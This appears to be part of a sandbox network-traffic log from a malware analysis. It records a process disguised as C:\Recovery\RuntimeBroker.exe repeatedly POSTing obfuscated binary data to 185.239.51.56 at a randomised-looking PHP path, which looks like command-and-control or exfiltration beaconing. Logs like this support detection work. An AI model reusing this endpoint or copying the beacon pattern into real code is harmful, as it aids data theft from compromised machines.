                                                                                                  Jan 1, 2025 02:27:58.347083092 CET | 2504 | OUT | Data Raw: 56 59 5e 57 5a 5f 5e 50 5f 5a 5a 53 57 50 56 57 5f 5f 5d 44 51 54 57 5d 5e 5a 58 5f 5b 5b 55 5e 5d 5b 5f 5d 52 5f 57 53 5e 56 59 5d 5b 5c 54 5b 55 56 58 41 46 5e 51 58 57 5a 53 51 5e 5b 5b 54 5a 57 5d 42 57 45 51 52 58 59 5b 5d 5a 5f 5b 5c 5b 5b
                                                                                                  Data Ascii: VY^WZ_^P_ZZSWPVW__]DQTW]^ZX_[[U^][_]R_WS^VY][\T[UVXAF^QXWZSQ^[[TZW]BWEQRXY[]Z_[\[[TPT\\[U^Z_[ZVQQ_YRZX^ZX^\^_P^][WWQ[_PPXRX_PV]X^RZRS^^[Y^YRTC^SQ[Q@S_[]^[_\]\UWZ^CX_P\UX\V\XVVTCFX^\W][$(61<X% 8%<<8)"%& ?T'84%7=--"^%#[.
                                                                                                  Jan 1, 2025 02:27:58.690412998 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                  Jan 1, 2025 02:27:58.697778940 CET | 185 | IN | HTTP/1.0 500 Internal Server Error
                                                                                                  Date: Wed, 01 Jan 2025 01:27:58 GMT
                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                  Content-Length: 0
                                                                                                  Connection: close
                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                  62 | 192.168.2.4 | 49833 | 185.239.51.56 | 80 | 6340 | C:\Recovery\RuntimeBroker.exe
                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                  Jan 1, 2025 02:27:58.818903923 CET | 295 | OUT | POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
                                                                                                  Content-Type: application/octet-stream
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                  Host: 185.239.51.56
                                                                                                  Content-Length: 2504
                                                                                                  Expect: 100-continue
                                                                                                  Connection: Keep-Alive
                                                                                                  Jan 1, 2025 02:27:59.175158978 CET | 2504 | OUT | Data Raw: 56 5d 5e 56 5a 5a 5e 53 5f 5a 5a 53 57 58 56 57 5f 5c 5d 49 51 53 57 58 5e 5a 58 5f 5b 5b 55 5e 5d 5b 5f 5d 52 5f 57 53 5e 56 59 5d 5b 5c 54 5b 55 56 58 41 46 5e 51 58 57 5a 53 51 5e 5b 5b 54 5a 57 5d 42 57 45 51 52 58 59 5b 5d 5a 5f 5b 5c 5b 5b
                                                                                                  Data Ascii: V]^VZZ^S_ZZSWXVW_\]IQSWX^ZX_[[U^][_]R_WS^VY][\T[UVXAF^QXWZSQ^[[TZW]BWEQRXY[]Z_[\[[TPT\\[U^Z_[ZVQQ_YRZX^ZX^\^_P^][WWQ[_PPXRX_PV]X^RZRS^^[Y^YRTC^SQ[Q@S_[]^[_\]\UWZ^CX_P\UX\V\XVVTCFX^\W]['B+*["!8[%8[/.6[+(!X!>_#8#%;$&'."^%#[."
                                                                                                  Jan 1, 2025 02:27:59.520526886 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                  Jan 1, 2025 02:27:59.529906034 CET | 185 | IN | HTTP/1.0 500 Internal Server Error
                                                                                                  Date: Wed, 01 Jan 2025 01:27:59 GMT
                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                  Content-Length: 0
                                                                                                  Connection: close
                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                  63 | 192.168.2.4 | 49840 | 185.239.51.56 | 80 | 6340 | C:\Recovery\RuntimeBroker.exe
                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                  Jan 1, 2025 02:27:59.659266949 CET | 295 | OUT | POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
                                                                                                  Content-Type: application/octet-stream
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                  Host: 185.239.51.56
                                                                                                  Content-Length: 2504
                                                                                                  Expect: 100-continue
                                                                                                  Connection: Keep-Alive
                                                                                                  Jan 1, 2025 02:28:00.003308058 CET | 2504 | OUT | Data Raw: 56 5f 5e 52 5f 5d 5b 5d 5f 5a 5a 53 57 51 56 53 5f 58 5d 44 51 50 57 5f 5e 5a 58 5f 5b 5b 55 5e 5d 5b 5f 5d 52 5f 57 53 5e 56 59 5d 5b 5c 54 5b 55 56 58 41 46 5e 51 58 57 5a 53 51 5e 5b 5b 54 5a 57 5d 42 57 45 51 52 58 59 5b 5d 5a 5f 5b 5c 5b 5b
                                                                                                  Data Ascii: V_^R_][]_ZZSWQVS_X]DQPW_^ZX_[[U^][_]R_WS^VY][\T[UVXAF^QXWZSQ^[[TZW]BWEQRXY[]Z_[\[[TPT\\[U^Z_[ZVQQ_YRZX^ZX^\^_P^][WWQ[_PPXRX_PV]X^RZRS^^[Y^YRTC^SQ[Q@S_[]^[_\]\UWZ^CX_P\UX\V\XVVTCFX^\W][$<!#"/'0?/*]?7"+(6%.Z78'Q0+4^272,-"^%#[.


                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                  64 | 192.168.2.4 | 49843 | 185.239.51.56 | 80 | 6340 | C:\Recovery\RuntimeBroker.exe
                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                  Jan 1, 2025 02:28:00.180835962 CET | 295 | OUT | POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
                                                                                                  Content-Type: application/octet-stream
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                  Host: 185.239.51.56
                                                                                                  Content-Length: 1572
                                                                                                  Expect: 100-continue
                                                                                                  Connection: Keep-Alive
                                                                                                  Jan 1, 2025 02:28:00.534584045 CET | 1572 | OUT | Data Raw: 56 5e 5e 53 5f 5d 5b 52 5f 5a 5a 53 57 5e 56 5f 5f 55 5d 45 51 55 57 58 5e 5a 58 5f 5b 5b 55 5e 5d 5b 5f 5d 52 5f 57 53 5e 56 59 5d 5b 5c 54 5b 55 56 58 41 46 5e 51 58 57 5a 53 51 5e 5b 5b 54 5a 57 5d 42 57 45 51 52 58 59 5b 5d 5a 5f 5b 5c 5b 5b
                                                                                                  Data Ascii: V^^S_][R_ZZSW^V__U]EQUWX^ZX_[[U^][_]R_WS^VY][\T[UVXAF^QXWZSQ^[[TZW]BWEQRXY[]Z_[\[[TPT\\[U^Z_[ZVQQ_YRZX^ZX^\^_P^][WWQ[_PPXRX_PV]X^RZRS^^[Y^YRTC^SQ[Q@S_[]^[_\]\UWZ^CX_P\UX\V\XVVTCFX^\W][$(*Z#232 Y/6\?4*86%48W$8?%"--"^%#[.
                                                                                                  Jan 1, 2025 02:28:00.887928963 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                  Jan 1, 2025 02:28:00.896472931 CET | 185 | IN | HTTP/1.0 500 Internal Server Error
                                                                                                  Date: Wed, 01 Jan 2025 01:28:00 GMT
                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                  Content-Length: 0
                                                                                                  Connection: close
                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                  65 | 192.168.2.4 | 49844 | 185.239.51.56 | 80 | 6340 | C:\Recovery\RuntimeBroker.exe
                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                  Jan 1, 2025 02:28:00.418203115 CET | 295 | OUT | POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
                                                                                                  Content-Type: application/octet-stream
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                  Host: 185.239.51.56
                                                                                                  Content-Length: 2504
                                                                                                  Expect: 100-continue
                                                                                                  Connection: Keep-Alive
                                                                                                  Jan 1, 2025 02:28:00.768995047 CET | 2504 | OUT | Data Raw: 56 5a 5b 53 5f 5c 5b 50 5f 5a 5a 53 57 5a 56 52 5f 5c 5d 46 51 51 57 50 5e 5a 58 5f 5b 5b 55 5e 5d 5b 5f 5d 52 5f 57 53 5e 56 59 5d 5b 5c 54 5b 55 56 58 41 46 5e 51 58 57 5a 53 51 5e 5b 5b 54 5a 57 5d 42 57 45 51 52 58 59 5b 5d 5a 5f 5b 5c 5b 5b
                                                                                                  Data Ascii: VZ[S_\[P_ZZSWZVR_\]FQQWP^ZX_[[U^][_]R_WS^VY][\T[UVXAF^QXWZSQ^[[TZW]BWEQRXY[]Z_[\[[TPT\\[U^Z_[ZVQQ_YRZX^ZX^\^_P^][WWQ[_PPXRX_PV]X^RZRS^^[Y^YRTC^SQ[Q@S_[]^[_\]\UWZ^CX_P\UX\V\XVVTCFX^\W]['+2Z"1;%#/2<71+=[6)7+,04^1$>9="^%#[.*
                                                                                                  Jan 1, 2025 02:28:01.122096062 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                  Jan 1, 2025 02:28:01.287503958 CET | 185 | IN | HTTP/1.0 500 Internal Server Error
                                                                                                  Date: Wed, 01 Jan 2025 01:28:01 GMT
                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                  Content-Length: 0
                                                                                                  Connection: close
                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                  66 | 192.168.2.4 | 49853 | 185.239.51.56 | 80 | 6340 | C:\Recovery\RuntimeBroker.exe
                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                  Jan 1, 2025 02:28:01.415987968 CET | 295 | OUT | POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
                                                                                                  Content-Type: application/octet-stream
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                  Host: 185.239.51.56
                                                                                                  Content-Length: 2504
                                                                                                  Expect: 100-continue
                                                                                                  Connection: Keep-Alive
                                                                                                  Jan 1, 2025 02:28:01.769074917 CET | 2504 | OUT | Data Raw: 56 59 5b 50 5a 58 5e 50 5f 5a 5a 53 57 51 56 54 5f 55 5d 45 51 53 57 5b 5e 5a 58 5f 5b 5b 55 5e 5d 5b 5f 5d 52 5f 57 53 5e 56 59 5d 5b 5c 54 5b 55 56 58 41 46 5e 51 58 57 5a 53 51 5e 5b 5b 54 5a 57 5d 42 57 45 51 52 58 59 5b 5d 5a 5f 5b 5c 5b 5b
                                                                                                  Data Ascii: VY[PZX^P_ZZSWQVT_U]EQSW[^ZX_[[U^][_]R_WS^VY][\T[UVXAF^QXWZSQ^[[TZW]BWEQRXY[]Z_[\[[TPT\\[U^Z_[ZVQQ_YRZX^ZX^\^_P^][WWQ[_PPXRX_PV]X^RZRS^^[Y^YRTC^SQ[Q@S_[]^[_\]\UWZ^CX_P\UX\V\XVVTCFX^\W]['B<?2""/'3+,%+B9+85Z"&!#+#Q3%-9="^%#[.
                                                                                                  Jan 1, 2025 02:28:02.150590897 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                  Jan 1, 2025 02:28:02.292403936 CET | 185 | IN | HTTP/1.0 500 Internal Server Error
                                                                                                  Date: Wed, 01 Jan 2025 01:28:02 GMT
                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                  Content-Length: 0
                                                                                                  Connection: close
                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                  67 | 192.168.2.4 | 49860 | 185.239.51.56 | 80 | 6340 | C:\Recovery\RuntimeBroker.exe
                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                  Jan 1, 2025 02:28:02.415165901 CET | 295 | OUT | POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
                                                                                                  Content-Type: application/octet-stream
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                  Host: 185.239.51.56
                                                                                                  Content-Length: 2504
                                                                                                  Expect: 100-continue
                                                                                                  Connection: Keep-Alive
Jan 1, 2025 02:28:03.136748075 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 02:28:03.149343014 CET | 185 | IN | HTTP/1.0 500 Internal Server Error
                                                                                                  Date: Wed, 01 Jan 2025 01:28:03 GMT
                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                  Content-Length: 0
                                                                                                  Connection: close
                                                                                                  Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
68 | 192.168.2.4 | 49867 | 185.239.51.56 | 80 | 6340 | C:\Recovery\RuntimeBroker.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 02:28:03.351349115 CET | 295 | OUT | POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
                                                                                                  Content-Type: application/octet-stream
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                  Host: 185.239.51.56
                                                                                                  Content-Length: 2504
                                                                                                  Expect: 100-continue
                                                                                                  Connection: Keep-Alive
Jan 1, 2025 02:28:04.098622084 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 02:28:04.255013943 CET | 185 | IN | HTTP/1.0 500 Internal Server Error
                                                                                                  Date: Wed, 01 Jan 2025 01:28:03 GMT
                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                  Content-Length: 0
                                                                                                  Connection: close
                                                                                                  Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
69 | 192.168.2.4 | 49876 | 185.239.51.56 | 80 | 6340 | C:\Recovery\RuntimeBroker.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 02:28:04.381692886 CET | 295 | OUT | POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
                                                                                                  Content-Type: application/octet-stream
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                  Host: 185.239.51.56
                                                                                                  Content-Length: 2504
                                                                                                  Expect: 100-continue
                                                                                                  Connection: Keep-Alive
Jan 1, 2025 02:28:05.093189001 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 02:28:05.104100943 CET | 185 | IN | HTTP/1.0 500 Internal Server Error
                                                                                                  Date: Wed, 01 Jan 2025 01:28:04 GMT
                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                  Content-Length: 0
                                                                                                  Connection: close
                                                                                                  Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
70 | 192.168.2.4 | 49882 | 185.239.51.56 | 80 | 6340 | C:\Recovery\RuntimeBroker.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 02:28:05.224291086 CET | 295 | OUT | POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
                                                                                                  Content-Type: application/octet-stream
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                  Host: 185.239.51.56
                                                                                                  Content-Length: 2504
                                                                                                  Expect: 100-continue
                                                                                                  Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
71 | 192.168.2.4 | 49888 | 185.239.51.56 | 80 | 6340 | C:\Recovery\RuntimeBroker.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 02:28:05.915301085 CET | 295 | OUT | POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
                                                                                                  Content-Type: application/octet-stream
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                  Host: 185.239.51.56
                                                                                                  Content-Length: 1600
                                                                                                  Expect: 100-continue
                                                                                                  Connection: Keep-Alive
Jan 1, 2025 02:28:06.617422104 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 02:28:06.626594067 CET | 185 | IN | HTTP/1.0 500 Internal Server Error
                                                                                                  Date: Wed, 01 Jan 2025 01:28:06 GMT
                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                  Content-Length: 0
                                                                                                  Connection: close
                                                                                                  Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
72 | 192.168.2.4 | 49889 | 185.239.51.56 | 80 | 6340 | C:\Recovery\RuntimeBroker.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 02:28:06.035043001 CET | 295 | OUT | POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
                                                                                                  Content-Type: application/octet-stream
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                  Host: 185.239.51.56
                                                                                                  Content-Length: 2504
                                                                                                  Expect: 100-continue
                                                                                                  Connection: Keep-Alive
Jan 1, 2025 02:28:06.747714996 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 02:28:06.759414911 CET | 185 | IN | HTTP/1.0 500 Internal Server Error
                                                                                                  Date: Wed, 01 Jan 2025 01:28:06 GMT
                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                  Content-Length: 0
                                                                                                  Connection: close
                                                                                                  Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
73 | 192.168.2.4 | 49895 | 185.239.51.56 | 80 | 6340 | C:\Recovery\RuntimeBroker.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 02:28:06.886421919 CET | 295 | OUT | POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
                                                                                                  Content-Type: application/octet-stream
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                  Host: 185.239.51.56
                                                                                                  Content-Length: 2504
                                                                                                  Expect: 100-continue
                                                                                                  Connection: Keep-Alive
Jan 1, 2025 02:28:07.596858025 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 02:28:07.737559080 CET | 185 | IN | HTTP/1.0 500 Internal Server Error
                                                                                                  Date: Wed, 01 Jan 2025 01:28:07 GMT
                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                  Content-Length: 0
                                                                                                  Connection: close
                                                                                                  Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
74 | 192.168.2.4 | 49903 | 185.239.51.56 | 80 | 6340 | C:\Recovery\RuntimeBroker.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 02:28:07.863894939 CET | 295 | OUT | POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
                                                                                                  Content-Type: application/octet-stream
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                  Host: 185.239.51.56
                                                                                                  Content-Length: 2500
                                                                                                  Expect: 100-continue
                                                                                                  Connection: Keep-Alive
Jan 1, 2025 02:28:08.574812889 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 02:28:08.586486101 CET | 185 | IN | HTTP/1.0 500 Internal Server Error
                                                                                                  Date: Wed, 01 Jan 2025 01:28:08 GMT
                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                  Content-Length: 0
                                                                                                  Connection: close
                                                                                                  Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
75 | 192.168.2.4 | 49909 | 185.239.51.56 | 80 | 6340 | C:\Recovery\RuntimeBroker.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 02:28:08.709635973 CET | 295 | OUT | POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
                                                                                                  Content-Type: application/octet-stream
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                  Host: 185.239.51.56
                                                                                                  Content-Length: 2500
                                                                                                  Expect: 100-continue
                                                                                                  Connection: Keep-Alive
Jan 1, 2025 02:28:09.439157963 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 02:28:09.446872950 CET | 185 | IN | HTTP/1.0 500 Internal Server Error
                                                                                                  Date: Wed, 01 Jan 2025 01:28:09 GMT
                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                  Content-Length: 0
                                                                                                  Connection: close
                                                                                                  Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
76 | 192.168.2.4 | 49917 | 185.239.51.56 | 80 | 6340 | C:\Recovery\RuntimeBroker.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 02:28:09.566495895 CET | 295 | OUT | POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
                                                                                                  Content-Type: application/octet-stream
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                  Host: 185.239.51.56
                                                                                                  Content-Length: 2504
                                                                                                  Expect: 100-continue
                                                                                                  Connection: Keep-Alive
Jan 1, 2025 02:28:10.290724039 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 02:28:10.431458950 CET | 185 | IN | HTTP/1.0 500 Internal Server Error
                                                                                                  Date: Wed, 01 Jan 2025 01:28:10 GMT
                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                  Content-Length: 0
                                                                                                  Connection: close
                                                                                                  Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
77 | 192.168.2.4 | 49924 | 185.239.51.56 | 80 | 6340 | C:\Recovery\RuntimeBroker.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 02:28:10.551018000 CET | 295 | OUT | POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
                                                                                                  Content-Type: application/octet-stream
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                  Host: 185.239.51.56
                                                                                                  Content-Length: 2504
                                                                                                  Expect: 100-continue
                                                                                                  Connection: Keep-Alive
Jan 1, 2025 02:28:11.260884047 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 02:28:11.399409056 CET | 185 | IN | HTTP/1.0 500 Internal Server Error
Date: Wed, 01 Jan 2025 01:28:11 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
78 | 192.168.2.4 | 49931 | 185.239.51.56 | 80 | 6340 | C:\Recovery\RuntimeBroker.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 02:28:11.517672062 CET | 295 | OUT | POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Host: 185.239.51.56
Content-Length: 2504
Expect: 100-continue
Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
79 | 192.168.2.4 | 49932 | 185.239.51.56 | 80 | 6340 | C:\Recovery\RuntimeBroker.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 02:28:11.633991957 CET | 295 | OUT | POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Host: 185.239.51.56
Content-Length: 1572
Expect: 100-continue
Connection: Keep-Alive
Jan 1, 2025 02:28:11.987782955 CET | 1572 | OUT | request body (application/octet-stream)
Jan 1, 2025 02:28:12.376564026 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 02:28:12.384185076 CET | 185 | IN | HTTP/1.0 500 Internal Server Error
Date: Wed, 01 Jan 2025 01:28:12 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
80 | 192.168.2.4 | 49934 | 185.239.51.56 | 80 | 6340 | C:\Recovery\RuntimeBroker.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 02:28:11.753803015 CET | 295 | OUT | POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Host: 185.239.51.56
Content-Length: 2504
Expect: 100-continue
Connection: Keep-Alive
Jan 1, 2025 02:28:12.112699986 CET | 2504 | OUT | request body (application/octet-stream)
Jan 1, 2025 02:28:12.501991034 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 02:28:12.510299921 CET | 185 | IN | HTTP/1.0 500 Internal Server Error
Date: Wed, 01 Jan 2025 01:28:12 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
81 | 192.168.2.4 | 49942 | 185.239.51.56 | 80 | 6340 | C:\Recovery\RuntimeBroker.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 02:28:12.628787041 CET | 295 | OUT | POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Host: 185.239.51.56
Content-Length: 2504
Expect: 100-continue
Connection: Keep-Alive
Jan 1, 2025 02:28:12.987763882 CET | 2504 | OUT | request body (application/octet-stream)
Jan 1, 2025 02:28:13.339696884 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 02:28:13.477030039 CET | 185 | IN | HTTP/1.0 500 Internal Server Error
Date: Wed, 01 Jan 2025 01:28:13 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
82 | 192.168.2.4 | 49949 | 185.239.51.56 | 80 | 6340 | C:\Recovery\RuntimeBroker.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 02:28:13.598387003 CET | 295 | OUT | POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Host: 185.239.51.56
Content-Length: 2504
Expect: 100-continue
Connection: Keep-Alive
Jan 1, 2025 02:28:13.956963062 CET | 2504 | OUT | request body (application/octet-stream)
Jan 1, 2025 02:28:14.300443888 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 02:28:14.308139086 CET | 185 | IN | HTTP/1.0 500 Internal Server Error
Date: Wed, 01 Jan 2025 01:28:14 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
83 | 192.168.2.4 | 49955 | 185.239.51.56 | 80 | 6340 | C:\Recovery\RuntimeBroker.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 02:28:14.428764105 CET | 295 | OUT | POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Host: 185.239.51.56
Content-Length: 2504
Expect: 100-continue
Connection: Keep-Alive
Jan 1, 2025 02:28:14.784682989 CET | 2504 | OUT | request body (application/octet-stream)
Jan 1, 2025 02:28:15.130435944 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 02:28:15.137886047 CET | 185 | IN | HTTP/1.0 500 Internal Server Error
Date: Wed, 01 Jan 2025 01:28:15 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
84 | 192.168.2.4 | 49961 | 185.239.51.56 | 80 | 6340 | C:\Recovery\RuntimeBroker.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 02:28:15.279395103 CET | 295 | OUT | POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Host: 185.239.51.56
Content-Length: 2504
Expect: 100-continue
Connection: Keep-Alive
